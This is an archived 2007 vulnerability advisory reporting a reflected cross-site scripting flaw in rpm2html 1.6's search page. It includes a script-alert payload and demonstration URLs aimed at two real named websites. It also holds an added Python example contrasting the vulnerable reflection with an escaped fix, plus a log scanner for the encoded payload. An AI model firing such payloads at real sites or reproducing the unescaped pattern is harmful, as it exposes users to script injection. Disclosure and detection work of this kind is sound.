From:Vlad Ionescu <ym_vladiii_(at)_yahoo.com>
Date:18.05.2007
Subject:rpm2html 1.6 XSS Vulnerability

----------------------------------------------------------------------|
My Name: Vladiii                                                      |
My Country: Romania                                                   |
My Site: http://www.rstzone.net                                       |
My Team: I hope to enter in RST-Crew :)                               |
Contact me: ym_vladiii@yahoo.com                                      |
Special Shoutz: kw3rln (fluffy_bunny), flo_flow_supremacy, mozi2weed, |
               & all RST-crew & RSB-team Members.                    |
----------------------------------------------------------------------|
Vulnerable code: rpm2html 1.6                                         |
Download it from: http://public.www.planetmirror.com/pub/rpm2html/    |
----------------------------------------------------------------------|
XSS Vulnerability in search function :)
Details: we can change the query in the URL to <script>alert('xss')</script>
        and a message box with our code will appear :)
Demonstration: http://vulerablesite.com/path/rpm2html[path]/search.php?query=<script>alert('xss')</script>&blabla
Live demonstration: http://rpms.mandrivaclub.com/search.php?query=%3Cscript%3Ealert('xss')%3C/script%3E&submit=Search+...
                    http://rpmfind.net/linux/rpm2html/search.php?query=%3Cscript%3Ealert('xss')%3C/script%3E

POC !

vladiii 2007
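The reflection the advisory describes, shown as the vulnerable pattern beside its HTML-escaped form, plus a check that pulls the percent-encoded payload out of web-server access logs. This is an added Python example, not rpm2html's own code: the render functions and the combined-format log lines are constructed for illustration.

```python
import html
from urllib.parse import urlsplit, parse_qs

# Constructed sample: the search term the advisory describes.
PAYLOAD = "<script>alert('xss')</script>"

# Constructed access-log lines (combined format); the second carries the
# advisory's payload percent-encoded, with the quotes encoded as %27 as a
# browser would send them.
SAMPLE_LOG = [
    '203.0.113.5 - - [18/May/2007:10:00:00 +0000] '
    '"GET /search.php?query=gcc&submit=Search HTTP/1.1" 200 512',
    '203.0.113.9 - - [18/May/2007:10:00:01 +0000] '
    '"GET /search.php?query=%3Cscript%3Ealert(%27xss%27)%3C/script%3E'
    '&submit=Search HTTP/1.1" 200 512',
]

def render_vulnerable(query: str) -> str:
    """Reflects the search term into the page verbatim: the flaw reported."""
    return f"<h2>Search results for: {query}</h2>"

def render_hardened(query: str) -> str:
    """Fix for an HTML text context: escape <, >, &, and both quote styles
    before the term reaches the page, so the browser renders it as text."""
    return f"<h2>Search results for: {html.escape(query, quote=True)}</h2>"

def suspicious_search_requests(log_lines):
    """Return the decoded 'query' values from log lines that contain a script
    tag once percent-decoding is undone; a plain substring match on the raw
    log would miss the %3Cscript%3E form seen in the advisory's URLs."""
    hits = []
    for line in log_lines:
        try:
            target = line.split('"')[1].split(" ")[1]  # request target
        except IndexError:
            continue                                    # malformed line
        params = parse_qs(urlsplit(target).query)       # decodes %XX and '+'
        for value in params.get("query", []):
            if "<script" in value.lower():
                hits.append(value)
    return hits

if __name__ == "__main__":
    print(render_vulnerable(PAYLOAD))
    print(render_hardened(PAYLOAD))
    print(suspicious_search_requests(SAMPLE_LOG))
```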


© SecurityVulns, 3APA3A, Vladimir Dubrovin